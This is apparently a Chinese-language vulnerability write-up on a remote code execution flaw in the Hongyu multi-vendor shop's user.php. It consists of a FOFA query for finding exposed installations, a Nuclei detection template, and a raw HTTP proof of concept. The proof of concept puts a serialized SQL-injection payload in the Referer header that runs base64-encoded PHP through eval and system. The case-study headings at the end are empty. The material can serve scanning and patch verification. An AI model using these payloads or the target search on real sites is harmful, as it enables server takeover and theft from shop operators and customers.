资产搜集

FOFA：body="content=HongYuJD" && body="68ecshopcom_360buy"

漏洞扫描

将FOFA搜索到的资产导出，使用Nuclei进行扫描：

nuclei：

id: hy-user-rce

info:
  name: hy-user-rce
  author: yvling
  severity: critical
  description: 鸿宇多用户商城 user.php RCE

http:
  - raw: 
    - |
      POST /user.php HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
      Content-Type: application/x-www-form-urlencoded
      Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:233:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243686959584e6c4e6a52665a47566a6232526c4b435266554539545646747961574e7258536b704f773d3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
      Accept-Encoding: gzip
      Connection: close
      
      action=login&rick=ZWNobyhzeXN0ZW0oImVjaG8gVEhJUyBJUyBBIFRFU1QiKSk7      

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains_all(body,"THIS IS A TEST")'

漏洞验证

POC：

POST /user.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:233:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243686959584e6c4e6a52665a47566a6232526c4b435266554539545646747961574e7258536b704f773d3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Accept-Encoding: gzip
Connection: close

action=login&rick=ZWNobyhzeXN0ZW0oImVjaG8gVEhJUyBJUyBBIFRFU1QiKSk7

案例一

案例二

案例三